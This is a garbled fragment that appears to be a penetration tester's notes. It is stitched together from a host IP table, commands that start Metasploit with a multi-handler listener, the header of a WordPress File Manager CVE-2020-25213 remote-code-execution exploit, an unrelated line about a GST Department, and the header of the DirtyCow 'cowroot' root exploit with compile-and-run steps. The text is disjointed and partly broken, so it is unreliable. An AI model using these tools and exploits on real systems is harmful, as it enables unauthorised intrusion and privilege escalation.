Host IP |
---|
192.168.100.1 |
service postgresql start
sudo msfdb start
msfconsole -qr /home/siddicky/tools/multi-handler.rc
#!/usr/bin/env | |
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE | |
# Date: [ 22-01-2023 ] | |
# Exploit Author: [BLY] | |
# Vendor Homepage: [https://wpscan.com/vulnerability/10389] | |
# Version: [ File Manager plugin 6.0-6.9] | |
# Tested on: [ Debian ] | |
# CVE : [ CVE-2020-25213 ] |
Context - For professionals working in the GST Department.
/* | |
* (un)comment correct payload first (x86 or x64)! | |
* | |
* $ gcc cowroot.c -o cowroot -pthread | |
* $ ./cowroot | |
* DirtyCow root privilege escalation | |
* Backing up /usr/bin/passwd.. to /tmp/bak | |
* Size of binary: 57048 | |
* Racing, this may take a while.. | |
* /usr/bin/passwd overwritten |